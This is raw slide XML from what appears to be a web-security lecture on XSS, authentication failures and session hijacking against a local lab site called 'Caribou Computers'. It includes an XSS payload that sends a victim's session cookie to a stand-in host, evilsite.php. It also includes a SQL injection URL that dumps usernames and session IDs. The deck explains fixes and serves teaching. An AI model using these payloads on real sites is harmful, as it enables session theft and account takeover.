              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</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caribou_computers.php?referrer</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;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('&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</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evilsite.php?comment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('&gt;');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('Click here to go back&lt;/a&gt;');&lt;/script&gt;"&gt;Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Carabou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Computers&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now when someone (who is logged into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Carabou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Computers) clicks on this link. Caribou’s site will display but it will have a “click here to logout” link.  Anyone clicking on that link will have their session key posted on evilsite.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> It’s worth taking the time to figure out how each part of this works. But that’s the basics of an XSS attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383186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Fixing XSS</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altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Like other types of injection (SQL, Command, Code) XSS can be fixed by filtering your data inputs.  Clearly when we are inserting data for something as simple as a referral string.  We don’t need to be able to insert the angle brackets “&lt;“ and “&gt;”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>So, disallowing anything other than the letters A-Z and the numbers 0-9 would be a good start.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This attack also relies on the session key being a cookie and that JavaScript can access the cookies in the same domain as the site we are visiting.  If you recall the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” feature can be activated on a cookie to make it invisible to JavaScript.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>However, you shouldn’t depend solely on this feature as there are more complex XSS attacks which can avoid it. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52719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3A0C-623B-22ED-4664-5C92E224C1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07:2021 – Identification and Authentication Failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE2AC8BB-C3B9-8DF4-1962-BEB5A577C19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67883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A07:2021 – Identification and Authentication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89"/>
            <a:ext cx="10658529" cy="3990759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Authentication Failures are somewhat related to cryptographic failures.  They include using low complexity passwords, no encryption or weak encryption or weak hashing algorithms on passwords or other sensitive data.  As well as systems that:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Expose the session key in the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Use weak session keys or reuses existing session keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Uses weak or ineffective password recovery systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Weak or Ineffective Password Recovery:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>One of the most important features of a password is how hard it is for someone to guess.  This is sometimes referred to as its randomness or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" i="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>entropy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.  Frequently password recovery systems rely on “known information” (e.g., addresses, mothers name, birthdate) things that often have far less entropy than the password you are attempting to recover.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to fix:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoid password recovery systems, if possible.  Otherwise rely on information that is at least as strong as the strongest password.</a:t>
            </a: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marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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194374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A07:2021 – Identification and Authentication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830960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Weak or Reused Session Keys:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Session keys like passwords need to have high degrees of entropy.  They need to be hard to guess not just for a particular user but in general.  Many applications get the first criteria correct but fail on the second.  Take for example the social security numbers used in the US – which are frequently used in identity theft.  It would be difficult to guess a particular person’s SSN but since SSNs are issued </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>in sequence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> it is easy to deduce a valid SSN. (e.g., My SSN-1 == Someone else’s SSN!).  If an identity thief is doing small-scale fraud (i.e., applying for credit cards in someone else’s name). Just about any SSN will do!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Similarly, an attacker may simply need any user account as they are going to use it in a privilege escalation attack.  So having a predictable session key makes their job easier. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Another issue is that since users frequently complain if they have to type in their password multiple times a day.  Session keys are frequently created with expiry dates far in the future.  If the session key isn’t changed during this period, then the next person who sits down at a machine you logged in on can harvest your session cookie from the browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to fix:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> Session keys should be implemented using established algorithms or the built-in primitives provided by your programming language or platform.  Session keys should be as short-lived as possible and changed very frequently.  In high-security settings changing your key every transaction may be advisable.  Algorithms like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>Lamport’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> Hash can do this efficiently.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354415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A07:2021 – Identification and Authentication Failures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3830960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exposed Session Key:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Even if a session key is complex, it needs to be private. Someone may not be able to memorize a complex session key in the URL of a browser, but they could take a picture of it and hijack your session.  Similarly, even when using cookies or POST Requests a session key can be exposed over the network by the use of HTTP rather than HTTPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>How to Fix:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> All traffic should be encrypted, and session keys should not be displayed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276418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39CC-ADCB-CCFC-6D96-393CEC9C0B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Examples – Part III</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6077BD2-23EB-7711-3CAE-D93B9FFCCA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2795500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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you recall from Lecture 7.  We used SQL injection to list all the tables in the database. There we found a table called “sessions”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Caribou Computers site has the same flaw.  A “search” string can be passed on the URL line, and it can be used to perform SQL injection. Let’s see if it has a session table..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://127.0.0.1/xSS%20Example/caribou_computers.php?search=%27)%20UNION%20SELECT%200,username,%20session_id,%200%20from%20sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84781782-380F-A749-264A-5D4DA1A00B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6652587" y="2120900"/>
            <a:ext cx="4739313" cy="3042025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306831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To follow along download the zip file marked “XSS Example.zip” and extract its contents in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\xampp\htdocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are also two SQL scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> import those </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>through phpMyAdmin.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At the end you should have a table called: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite_comments</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Once you do that you can point your browser at: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://127.0.0.1/XSS%20Example/caribou_computers.php</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Go ahead and create a new account.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9011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So, looking at the data on the right we see that there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>session_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> associated with each account, and it appears to be hashed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another thing you may have inferred from our use of this application is that the sessions don’t appear to expire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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id="{756E168F-BEF6-CF42-6E8B-2FD2792E09BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6652587" y="2120900"/>
            <a:ext cx="4739313" cy="3042025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2242742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85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many systems have sessions with very long expiry times (and a few have none at all).  So, there’s an opportunity to use this to access the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we use a cookie manager, we can see that our session appears to kept in an element called ‘session’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This tells us that the session cookie isn’t hashed until it gets to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
